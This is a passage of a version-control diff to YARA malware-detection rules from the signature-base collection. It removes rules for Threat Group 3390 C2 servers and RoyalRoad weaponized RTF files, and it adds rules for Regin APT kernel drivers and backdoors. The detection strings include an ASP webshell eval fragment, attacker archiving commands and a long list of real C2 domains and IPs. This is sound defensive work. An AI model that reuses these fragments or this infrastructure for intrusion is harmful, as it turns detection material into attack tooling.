+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L14-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1e4889a48f4f9bfcc12237dd44cd8ad9db9918c6a5859de086d1ddc051ff937"
-		score = 60
+		logic_hash = "1cc367dff184f2b458a2b7c0c88a44095714525ca6bb115d03e6331cf1f22116"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash2 = "06665b96e293b23acc80451abb413e50"
+		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
 
 	strings:
-		$s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
-		$s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
-		$s3 = "ren *.rar *.zip" fullword ascii
-		$s4 = "c:\\temp\\ipcan.exe" fullword ascii
-		$s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s0 = "atapi.sys" fullword wide
+		$s1 = "disk.sys" fullword wide
+		$s3 = "h.data" fullword ascii
+		$s4 = "\\system32" ascii
+		$s5 = "\\SystemRoot" ascii
+		$s6 = "system" fullword ascii
+		$s7 = "temp" fullword ascii
+		$s8 = "windows" fullword ascii
+		$x1 = "LRich6" fullword ascii
+		$x2 = "KeServiceDescriptorTable" fullword ascii
 
 	condition:
-		1 of them and filesize < 30KB
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and $m1 and all of ( $s* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Threatgroup3390_C2 : FILE
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_B : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT - C2 Server"
-		author = "Florian Roth (Nextron Systems)"
-		id = "232b5052-e349-55f1-bd7e-1afc5d35abe4"
-		date = "2015-08-06"
-		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_threatgroup_3390.yar#L204-L323"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be411bb8e301eb4ba611bc9d6c8f0e3b8c27b87c2dd3f8405d0eba0296117697"
-		score = 60
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "api.apigmail.com"
-		$s2 = "apigmail.com"
-		$s3 = "backup.darkhero.org"
-		$s4 = "bel.updatawindows.com"
-		$s5 = "binary.update-onlines.org"
-		$s6 = "blackcmd.com"
-		$s7 = "castle.blackcmd.com"
-		$s8 = "ctcb.blackcmd.com"
-		$s9 = "darkhero.org"
-		$s10 = "dav.local-test.com"
-		$s11 = "test.local-test.com"
-		$s12 = "dev.local-test.com"
-		$s13 = "ocean.local-test.com"
-		$s14 = "ga.blackcmd.com"
-		$s15 = "helpdesk.blackcmd.com"
-		$s16 = "helpdesk.csc-na.com"
-		$s17 = "helpdesk.hotmail-onlines.com"
-		$s18 = "helpdesk.lnip.org"
-		$s19 = "hotmail-onlines.com"
-		$s20 = "jobs.hotmail-onlines.com"
-		$s21 = "justufogame.com"
-		$s22 = "lnip.org"
-		$s23 = "local-test.com"
-		$s24 = "login.hansoftupdate.com"
-		$s25 = "long.update-onlines.org"
-		$s26 = "longlong.update-onlines.org"
-		$s27 = "longshadow.dyndns.org"
-		$s28 = "longshadow.update-onlines.org"
-		$s29 = "longykcai.update-onlines.org"
-		$s30 = "lostself.update-onlines.org"
-		$s31 = "mac.navydocument.com"
-		$s32 = "mail.csc-na.com"
-		$s33 = "mantech.updatawindows.com"
-		$s34 = "micr0soft.org"
-		$s35 = "microsoft-outlook.org"
-		$s36 = "mtc.navydocument.com"
-		$s37 = "navydocument.com"
-		$s38 = "mtc.update-onlines.org"
-		$s39 = "news.hotmail-onlines.com"
-		$s40 = "oac.3322.org"
-		$s41 = "ocean.apigmail.com"
-		$s42 = "pchomeserver.com"
-		$s43 = "registre.organiccrap.com"
-		$s44 = "security.pomsys.org"
-		$s45 = "services.darkhero.org"
-		$s46 = "sgl.updatawindows.com"
-		$s47 = "shadow.update-onlines.org"
-		$s48 = "sonoco.blackcmd.com"
-		$s49 = "test.logmastre.com"
-		$s50 = "up.gtalklite.com"
-		$s51 = "updatawindows.com"
-		$s52 = "update-onlines.org"
-		$s53 = "update.deepsoftupdate.com"
-		$s54 = "update.hancominc.com"
-		$s55 = "update.micr0soft.org"
-		$s56 = "update.pchomeserver.com"
-		$s57 = "urs.blackcmd.com"
-		$s58 = "wang.darkhero.org"
-		$s59 = "webs.local-test.com"
-		$s60 = "word.apigmail.com"
-		$s61 = "wordpress.blackcmd.com"
-		$s62 = "working.blackcmd.com"
-		$s63 = "working.darkhero.org"
-		$s64 = "working.hotmail-onlines.com"
-		$s65 = "www.trendmicro-update.org"
-		$s66 = "www.update-onlines.org"
-		$s67 = "x.apigmail.com"
-		$s68 = "ykcai.update-onlines.org"
-		$s69 = "ykcailostself.dyndns-free.com"
-		$s70 = "ykcainobody.dyndns.org"
-		$s71 = "zj.blackcmd.com"
-		$s72 = "laxness-lab.com"
-		$s73 = "google-ana1ytics.com"
-		$s74 = "www.google-ana1ytics.com"
-		$s75 = "ftp.google-ana1ytics.com"
-		$s76 = "hotmailcontact.net"
-		$s77 = "208.115.242.36"
-		$s78 = "208.115.242.37"
-		$s79 = "208.115.242.38"
-		$s80 = "66.63.178.142"
-		$s81 = "72.11.148.220"
-		$s82 = "72.11.141.133"
-		$s83 = "74.63.195.236"
-		$s84 = "74.63.195.236"
-		$s85 = "74.63.195.237"
-		$s86 = "74.63.195.238"
-		$s87 = "103.24.0.142"
-		$s88 = "103.24.1.54"
-		$s89 = "106.187.45.162"
-		$s90 = "192.151.236.138"
-		$s91 = "192.161.61.19"
-		$s92 = "192.161.61.20"
-		$s93 = "192.161.61.22"
-		$s94 = "103.24.1.54"
-		$s95 = "67.215.232.179"
-		$s96 = "96.44.177.195"
-		$s97 = "49.143.192.221"
-		$s98 = "67.215.232.181"
-		$s99 = "67.215.232.182"
-		$s100 = "96.44.182.243"
-		$s101 = "96.44.182.245"
-		$s102 = "96.44.182.246"
-		$s103 = "49.143.205.30"
-		$s104 = "working_success@163.com"
-		$s105 = "ykcaihyl@163.com"
-		$s106 = "working_success@163.com"
-		$s107 = "yuming@yinsibaohu.aliyun.com"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "14f31b2d-4753-54e8-891a-e28689ba57db"
+		date = "2014-11-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L43-L94"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "c2dee4f94f9eefb1c11f6e86144c6bfafc0845768200f5a839ffe3dd5d38294d"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+		hash4 = "06665b96e293b23acc80451abb413e50"
+		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+		hash6 = "4b6b86c7fec1c574706cecedf44abded"
+		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+		hash10 = "1c024e599ac055312a4ab75b3950040a"
+		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+		hash12 = "b505d65721bb2453d5039a389113b566"
+		hash13 = "b269894f434657db2b15949641a67532"
+
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s2 = "H.data" fullword ascii nocase
+		$s3 = "INIT" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		$v1 = "\\system32" ascii
+		$v2 = "\\SystemRoot" ascii
+		$v3 = "KeServiceDescriptorTable" fullword ascii
+		$w1 = "\\system32" ascii
+		$w2 = "\\SystemRoot" ascii
+		$w3 = "LRich6" fullword ascii
+		$x1 = "_snprintf" ascii
+		$x2 = "_except_handler3" ascii
+		$y1 = "mbstowcs" fullword ascii
+		$y2 = "wcstombs" fullword ascii
+		$y3 = "KeGetCurrentIrql" fullword ascii
+		$z1 = "wcscpy" fullword ascii
+		$z2 = "ZwCreateFile" fullword ascii
+		$z3 = "ZwQueryInformationFile" fullword ascii
+		$z4 = "wcslen" fullword ascii
+		$z5 = "atoi" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $v* ) or all of ( $w* ) or all of ( $x* ) or all of ( $y* ) or all of ( $z* ) ) and filesize < 20KB
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern1 : FILE
+rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_C : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "db2fb24c-df99-5622-ac3d-d31c34481984"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L25-L40"
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		id = "2006b3f0-abd1-5274-8b18-75368671e062"
+		date = "2014-11-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L96-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ebd507d95c454562fa0b364072120b35b1bf8dd2be129a419d893f6708ab9cca"
-		score = 80
+		logic_hash = "9454eb8b45a720fbe517caa2221fb0ceedf561902d94cabe513e921cc52fe035"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
 
 	strings:
-		$S1 = "48905d006c9c5b0000000000030101030a0a01085a5ab844eb7112ba7856341231"
-		$RTF = "{\\rt"
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
+		$s0 = "KeGetCurrentIrql" fullword ascii
+		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+		$s2 = "usbclass" fullword wide
+		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+		$x2 = "Universal Serial Bus Class Driver" fullword wide
+		$x3 = "5.2.3790.0" fullword wide
+		$y1 = "LSA Shell" fullword wide
+		$y2 = "0Richw" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $x* ) or all of ( $y* ) ) and filesize < 20KB
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern2 : FILE
+rule SIGNATURE_BASE_Regin_Sig_Svcsstat : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "135024ae-9ecf-5691-95ca-96002e500fd5"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L42-L57"
+		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+		author = "@MalwrSignatures"
+		id = "0cb493d7-c7f1-54c4-9805-d9894bf399da"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L126-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e252868042e5150d99de2c2f4642f3d91d764d5a062f3a8de9ab316e299e00ac"
-		score = 80
+		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+		logic_hash = "2b1fdc2cc8c0aedaf749ee0e87a8853b91735a4e215c65df221a930d4b1d02f7"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$S1 = "653037396132353234666136336135356662636665" ascii
-		$RTF = "{\\rt"
+		$s0 = "Service Control Manager" fullword ascii
+		$s1 = "_vsnwprintf" ascii
+		$s2 = "Root Agency" fullword ascii
+		$s3 = "Root Agency0" fullword ascii
+		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
+		$s5 = "\\\\?\\UNC" fullword wide
+		$s6 = "%ls%ls" fullword wide
 
 	condition:
-		$RTF at 0 and $S1
+		all of them and filesize < 15KB and filesize > 10KB
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern3 : FILE
+rule SIGNATURE_BASE_Regin_Sample_1 : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "7bce2fe6-a921-51ec-8b5f-5d7f55ab3864"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L59-L75"
+		description = "Semiautomatically generated YARA rule - file-3665415_sys"
+		author = "Florian Roth"
+		id = "13478652-155f-52ba-af16-53f27c92e052"
+		date = "2014-11-25"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L145-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b5d9872eb86d1a220e5b70c560e7054bee8b2bc1fa2a75781d87616674e2927"
-		score = 80
+		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+		logic_hash = "e8291b4a68924dccdd825ee2cc8930acb794e92e0302598872ec78eb0bf8504f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$S1 = "4746424151515151505050500000000000584242eb0642424235353336204460606060606060606061616161616161616161616161616161"
-		$RTF = "{\\rt"
+		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+		$s2 = "External Naming Failed - Status %x" fullword ascii
+		$s3 = "------- Same multiport - different interrupts" fullword ascii
+		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
+		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
+		$s6 = "Could not report legacy device - %x" fullword ascii
+		$s7 = "entering SerialGetPortInfo" fullword ascii
+		$s8 = "'user registry info - userPort: %x" fullword ascii
+		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+		$s10 = "Kernel debugger is using port at address %X" fullword ascii
+		$s12 = "Release - freeing multi context" fullword ascii
+		$s13 = "Serial driver will not load port" fullword ascii
+		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+		$s20 = "'user registry info - userIndexed: %d" fullword ascii
+		$fp1 = "Enter SerialBuildResourceList" ascii fullword
 
 	condition:
-		$RTF at 0 and $S1
+		all of them and filesize < 110KB and filesize > 80KB and not $fp1
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ab : FILE
+rule SIGNATURE_BASE_Regin_Sample_2 : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "b4926888-b576-59f7-932a-03b9326845da"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L77-L92"
+		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+		author = "@MalwrSignatures"
+		id = "1091a598-e964-5f67-9267-531d66831bee"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L176-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd9468b3208a27b6f3b56037013f06c4d2adbd201a12df141bc980ad595a75c0"
-		score = 80
+		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+		logic_hash = "a11d03d10661c1fc094450b250056196e5d8d16bd171eba9e37c7524aa2301d2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$S1 = "4746424151515151505050500000000000584242EB064242423535333620446060606060606060606161616161616}1616161616161616161" ascii
-		$RTF = "{\\rt"
+		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" wide
+		$s1 = "atapi.sys" fullword wide
+		$s2 = "disk.sys" fullword wide
+		$s3 = "IoGetRelatedDeviceObject" fullword ascii
+		$s4 = "HAL.dll" fullword ascii
+		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" ascii
+		$s6 = "PsGetCurrentProcessId" fullword ascii
+		$s7 = "KeGetCurrentIrql" fullword ascii
+		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s9 = "KeSetImportanceDpc" fullword ascii
+		$s10 = "KeQueryPerformanceCounter" fullword ascii
+		$s14 = "KeInitializeEvent" fullword ascii
+		$s15 = "KeDelayExecutionThread" fullword ascii
+		$s16 = "KeInitializeTimerEx" fullword ascii
+		$s18 = "PsLookupProcessByProcessId" fullword ascii
+		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		all of them and filesize < 40KB and filesize > 30KB
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ce : FILE
+rule SIGNATURE_BASE_Regin_Sample_3 : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "c6e8a072-23cd-5f6a-9b4f-57d3e4500d13"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L94-L109"
+		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		author = "@Malwrsignatures"
+		id = "eefc174f-4b17-5c90-8478-3eaaf80e9a78"
+		date = "2014-11-27"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L205-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7033c5874b406341a68f761b45fd6a9b73a9875c80b14d52a7c2240202c8fb40"
-		score = 80
+		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		logic_hash = "5a0f77f203765f7737c00c3df760ea7f3ed354559aad07f3053173ff09e1ce1a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$S1 = "584242eb064242423535333620446060606060606060606161616161616161616161616}1616161" ascii
-		$RTF = "{\\rt"
+		$s0 = "Service Pack x" fullword wide
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" wide
+		$s3 = "mntoskrnl.exe" fullword wide
+		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" wide
+		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+		$s6 = "Service Pack" fullword wide
+		$s7 = ".sys" fullword wide
+		$s8 = ".dll" fullword wide
+		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" wide
+		$s11 = "IoGetRelatedDeviceObject" fullword ascii
+		$s12 = "VMEM.sys" fullword ascii
+		$s13 = "RtlGetVersion" fullword wide
+		$s14 = "ntkrnlpa.exe" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		uint32( 0 ) == 0xfedcbafe and all of ( $s* ) and filesize > 160KB and filesize < 200KB
 }
-rule SIGNATURE_BASE_Royalroad_Code_Pattern4D : FILE
+rule SIGNATURE_BASE_Regin_Sample_Set_2 : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "1677dfb4-7611-5bef-87d1-4cec6285791f"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L113-L128"
+		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+		author = "@MalwrSignatures"
+		id = "0b21091d-413e-54dd-83d1-5d824fb013f2"
+		date = "2014-11-26"
+		modified = "2024-04-24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L232-L264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b531063d2a5ae36ae4e708a749dcf2cdc4c85fc43769a8525049e6facfca674"
-		score = 80
-		quality = 85
+		logic_hash = "26125cea704532cbc22df46af228299ae810bce60938bee7b067ed273158d76f"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
 
 	strings:
-		$S1 = "584242eb06424242353533362044606060606060606060616161616161616161616}16161616161" ascii
-		$RTF = "{\\rt"
+		$s0 = "HAL.dll" fullword ascii
+		$s1 = "IoGetDeviceObjectPointer" fullword ascii
+		$s2 = "MaximumPortsServiced" fullword wide
+		$s3 = "KeGetCurrentIrql" fullword ascii
+		$s4 = "ntkrnlpa.exe" fullword ascii
+		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s6 = "ConnectMultiplePorts" fullword wide
+		$s7 = "\\SYSTEMROOT" wide
+		$s8 = "IoWriteErrorLogEntry" fullword ascii
+		$s9 = "KeQueryPerformanceCounter" fullword ascii
+		$s10 = "KeServiceDescriptorTable" fullword ascii
+		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+		$s12 = "SeSinglePrivilegeCheck" fullword ascii
+		$s13 = "KeInitializeEvent" fullword ascii
+		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+		$s15 = "KeRemoveDeviceQueue" fullword ascii
+		$s16 = "IofCompleteRequest" fullword ascii
+		$s17 = "KeInitializeSpinLock" fullword ascii
+		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+		$s19 = "IoCreateDevice" fullword ascii
+		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		filesize < 40KB and filesize > 30KB and all of them
 }
-rule SIGNATURE_BASE_Royalroad_RTF : FILE
+rule SIGNATURE_BASE_Regin_Sample_Set_1 : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "366ec9c3-e6ad-5198-88d5-15aa84a8358f"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L133-L148"
+		description = "Detects Regin Backdoor sample"
+		author = "@MalwrSignatures"
+		id = "b0f24a0b-10e7-5549-a300-516df8644cb0"
+		date = "2014-11-27"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L266-L296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "20031fe6d6a0b2fad43f7e04bb82321c2ea75193f23194edead7ca530af8ac55"
-		score = 80
+		logic_hash = "7402f409e7dd3180d8e6fe017af19d0a1d0dd86f85279191db1bc8f6c94951ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
 
 	strings:
-		$S1 = "objw2180\\objh300" ascii
-		$RTF = "{\\rt"
+		$hd = { fe ba dc fe }
+		$s0 = "d%ls%ls" fullword wide
+		$s1 = "\\\\?\\UNC" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+		$s6 = "\\\\.\\Global\\%s" fullword wide
+		$s7 = "temp" fullword wide
+		$s8 = "\\\\.\\%s" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+		$s10 = "sscanf" fullword ascii
+		$s11 = "disp.dll" fullword ascii
+		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s13 = "%d.%d.%d.%d%c" fullword ascii
+		$s14 = "imagehlp.dll" fullword ascii
+		$s15 = "%hd %d" fullword ascii
 
 	condition:
-		$RTF at 0 and $S1
+		($hd at 0 ) and all of ( $s* ) and filesize < 450KB and filesize > 360KB
 }
-rule SIGNATURE_BASE_Royalroad_RTF_V7 : FILE
+rule SIGNATURE_BASE_Apt_Regin_Legspin : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
-		author = "nao_sec"
-		id = "9d2af980-a851-533a-b25d-ee52277e319c"
-		date = "2020-01-15"
-		modified = "2023-12-05"
-		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L150-L166"
+		description = "Rule to detect Regin's Legspin module"
+		author = "Kaspersky Lab"
+		id = "2abd3605-d9bf-53f0-8521-ac8dc18d9fce"
+		date = "2015-01-22"
+		date = "2023-01-27"
+		modified = "2024-04-24"
+		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L298-L319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
